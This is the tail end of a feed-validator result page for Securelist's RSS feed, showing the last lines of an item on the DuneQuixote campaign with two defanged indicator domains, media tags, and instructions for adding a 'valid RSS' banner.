1793. <a href="https://opentip.kaspersky.com/Service.userfeedsync.com/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">Service.userfeedsync[.]com</a><br />
1794. <a href="https://opentip.kaspersky.com/telemetry.userfeedsync.com/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">telemetry.userfeedsync[.]com</a></p>
1795. ]]></content:encoded>
1797. <wfw:commentRss>https://securelist.com/dunequixote/112425/feed/</wfw:commentRss>
1798. <slash:comments>0</slash:comments>
1801. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17203837/sl-dunequijote-apt-featured.jpg" width="1200" height="754"><media:keywords>full</media:keywords></media:content>
1802. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17203837/sl-dunequijote-apt-featured-1024x643.jpg" width="1024" height="643"><media:keywords>large</media:keywords></media:content>
1803. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17203837/sl-dunequijote-apt-featured-300x189.jpg" width="300" height="189"><media:keywords>medium</media:keywords></media:content>
1804. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17203837/sl-dunequijote-apt-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
1805. </item>
1806. </channel>
1807. </rss>
1808.  

If you would like to create a banner that links to this page (i.e. this validation result), do the following:

1. Download the "valid RSS" banner.

2. Upload the image to your own server. (This step is important. Please do not link directly to the image on this server.)

3. Add this HTML to your page (change the image src attribute if necessary):

   <a href="http://www.feedvalidator.org/check.cgi?url=https%3A//securelist.com/feed/"><img src="valid-rss-rogers.png" alt="[Valid RSS]" title="Validate my RSS feed" /></a>

If you would like to create a text link instead, here is the URL you can use:

http://www.feedvalidator.org/check.cgi?url=https%3A//securelist.com/feed/

Home · About · News · Docs · Terms